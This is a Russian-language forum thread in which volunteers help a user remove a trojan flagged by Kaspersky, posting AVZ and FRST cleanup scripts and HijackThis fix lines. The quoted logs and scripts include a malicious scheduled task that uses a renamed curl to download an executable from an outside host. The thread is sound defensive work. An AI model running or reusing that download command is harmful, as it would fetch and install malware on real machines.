Перейти к содержанию

Trojan.Multi.GenAutorunTask.c в системной памяти


Рекомендуемые сообщения

Здравствуйте, Kaspersky Endpoint Security 11 при каждом запуске системы находит вирус Trojan.multi.genautoruntask.c в системной памяти, при попытке устранить угрозу Касперский пишет что 1 объект не обработан. Лог с утилиты AVZ прилагаю, заранее спасибо

avz_log.txt

Ссылка на сообщение
Поделиться на другие сайты

Файл Hosts правили самостоятельно?

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 QuarantineFileF('c:\users\администратор\appdata\roaming\curl', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 ,0);
 QuarantineFile('C:\Windows\Fonts\Mysql\svchost.exe', '');
 QuarantineFile('C:\Users\Администратор\AppData\Roaming\curl\curl.exe', '');
 QuarantineFile('C:\Users\Администратор\AppData\Roaming\curl\curl_7_54.exe', '');
 DeleteFile('C:\Users\Администратор\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Администратор\AppData\Roaming\curl\curl.exe"', '32');
 DeleteFile('C:\Users\Администратор\AppData\Roaming\curl\curl.exe', '32');
 DeleteFile('C:\Users\Администратор\AppData\Roaming\curl\curl_7_54.exe', '32');
 DeleteFileMask('c:\users\администратор\appdata\roaming\curl', '*', true);
 DeleteSchedulerTask('curl.quarantined');
 DeleteSchedulerTask('curls.quarantined');
 DeleteDirectory('c:\users\администратор\appdata\roaming\curl');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

 

Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:

begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.

Полученный архив quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

 

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

O22 - Task: (damaged) \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser - C:\Windows\system32\CompatTelRunner.exe (Microsoft) (user missing)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{077474CB-DA6A-4E14-B6A9-341EF37FFD66} - \Update S1-8-22 (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{077474CB-DA6A-4E14-B6A9-341EF37FFD66} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1845DCCB-BDFF-4505-AA9C-8832A71E5272} - \Opera scheduled Autoupdate 1513753951 (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2F7BB325-9C0A-4CF6-8BDA-C207F52F596F} - \One Drive Update (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2F7BB325-9C0A-4CF6-8BDA-C207F52F596F} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3A3CA751-82FC-408C-8BC4-146686D1A61C} - \ZaxarGameBrowserz (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{88EED5FC-F20A-4576-8EAB-7BB5C9FC7647} - \nvfontcache (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{88EED5FC-F20A-4576-8EAB-7BB5C9FC7647} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{91C3A511-4FC9-4B54-9487-65A0ED9DC6D4} - \curl (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{91C3A511-4FC9-4B54-9487-65A0ED9DC6D4} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9DE96F17-EC17-45E4-8F73-0A669AB3620D} - \GoogleUpdate_Task_Core (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B87A35B3-F913-4D71-AC10-AECB5E9564B6} - \curls (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B87A35B3-F913-4D71-AC10-AECB5E9564B6} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B9B6770E-F99B-4FA0-BD0D-2C0F0FD70E45} - \GoogleUpdate_Task_Machine (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CB033D7D-7D93-4542-8D42-B6C9194CEFE9} - \DuckGo Task (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CB033D7D-7D93-4542-8D42-B6C9194CEFE9} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CFB0A9F3-BCE4-4F84-A97E-B40E83A30A59} - \OnePlus Drive Update (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CFB0A9F3-BCE4-4F84-A97E-B40E83A30A59} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WPD (empty)
O22 - Task: curl.quarantined - C:\Users\Администратор\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Администратор\AppData\Roaming\curl\curl.exe" (file missing)
O22 - Task: curls.quarantined - C:\Users\Администратор\AppData\Roaming\curl\curl.exe (file missing)

 

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".

Ссылка на сообщение
Поделиться на другие сайты

Результат загрузки:

Sergey_IT, Ваш карантин отправлен, спасибо!

Имя карантин-а(ов) сообщите в теме:
2021.11.19_quarantine_de95fbc0c2ec83b5050ec09d90fef25f.zip
Ссылка на сообщение
Поделиться на другие сайты

Дополнительно:

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Ссылка на сообщение
Поделиться на другие сайты
1 час назад, Sandor сказал:

Файл Hosts правили самостоятельно?

Не ответили.

 

Сообщите также самостоятельно ли ставили программу?

Цитата

Chromium-Gost

 

Ссылка на сообщение
Поделиться на другие сайты

Hosts правил, необходимо было его отредактировать для работы в тот момент когда рабочая станция находилась раннее в домене.

Chromium-Gost так же устанавливал сам.

Ссылка на сообщение
Поделиться на другие сайты

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Start::
    SystemRestore: On
    CreateRestorePoint:
    HKU\S-1-5-21-3800301354-2339470603-2501348306-1000\...\MountPoints2: {7152c183-07d3-11e7-8ee1-806e6f6e6963} - D:\ShelExec.exe open.htm
    GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
    GroupPolicy\User: Ограничение ? <==== ВНИМАНИЕ
    Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
    Policies: C:\Users\OtepovaNV\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
    Policies: C:\Users\Администратор\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
    U3 aswbdisk; отсутствует ImagePath
    2021-11-18 15:08 - 2020-03-04 10:23 - 000000000 __SHD C:\AdwCleaner
    AlternateDataStreams: C:\ProgramData\TEMP:E965A533 [129]
    FirewallRules: [{CABC3625-F663-4B5E-A80F-340729CFD55B}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe => Нет файла
    FirewallRules: [{96A891F5-CBCF-48A7-8410-3C9DFF98F47E}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe => Нет файла
    FirewallRules: [{47C59CAE-394B-4755-A04A-F2928CD7DBFA}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe => Нет файла
    FirewallRules: [{DBB8EFF7-66D7-446C-9215-572DE771C34F}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe => Нет файла
    FirewallRules: [{125E7D45-4FFE-4A8E-8D8D-30E4A9402992}] => (Allow) C:\Users\Администратор\AppData\Roaming\uTorrent\uTorrent.exe => Нет файла
    FirewallRules: [{E4C7ED3D-8220-4B12-A4A4-110A30FC0324}] => (Allow) C:\Users\Администратор\AppData\Roaming\uTorrent\uTorrent.exe => Нет файла
    EmptyTemp:
    Reboot:
    End::

     

  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

  • Похожий контент

    • Rey_fw
      От Rey_fw
      Добрый день!
      Каким то образом словил вирус/возможно майнер который не могу найти и 100% определить. Не дает запустить установочные файлы антивируса, ранее блокировал сайты антивирусов (решилось исправлением файла хостс). на диске С появились папки антивирусов (скрытые, без возможности зайти и удалить их)
      Попытался сканировать разными антивирусами Dr.Web CureIt! зависает вместе с пк и не сканирует дальше (пк стоял сутки на проверке)
      Аваст пишет что все отлично, вирусов нет. Встроенный антивирус виндовса тоже не выявляет проблему
       
      На форуме нашел крайне похожую ситуацию
      Можно ли помочь решить данный вопрос? Заранее очень и очень благодарен!
      Addition.zip
    • Matvey
      От Matvey
      Здравствуйте. Обнаружил у себя на компьютере майнер, находится по пути C:\ProgramData\RealtekHD и WindowsTask. Прошу помощи с удалением, спасибо.
      CollectionLog-2023.01.06-20.38.zip
    • Данил322
      От Данил322
      Здравствуйте, прошу вас о помощи, недавно заметил подозрительную активность на пк, процессор сильно грузится в простое, залез в диспетчер и увидел что повершелл грузит его на 30-40% а после включения диспетчера загрузка уходит, прошу пожалуйста если можно подетально обьяснить шаги действий, я чайник, архив скана из программы  Farbar Recovery Scan Tool прилагаю
      Архив WinRAR.rar
    • Матвей Аксенов
      От Матвей Аксенов
      Защитник виндовс обнуражил файл под именем cryptinject mtb, попытался через него удалить, но не удалось, также в исключении проверки безопасности виндус, обнаружил системные файлы которые находятся под исключением и удалить их из списка не могу, пытался, подозреваю что мешает вирус. Скачал Касперски ремувал тул, пока результат никакой, пытался скачать др веб курейт, но сайт на пк блокирует вирус, как и этот форум, поэтому пишу с телефона и не могу дать логи. Помогите, что следует делать, и как избавляться от этой заразы. Стоит ли вообще переустанавливать виндус? Никогда этим не занимался, поэтому стремаюсь
    • Prokop42
      От Prokop42
      Постоянно Каспер выдаёт всякую хрень, реагируя на программу Зона, скачанную с оф.сайта и спокойно работающую. Скрин прилагаю.

×
×
  • Создать...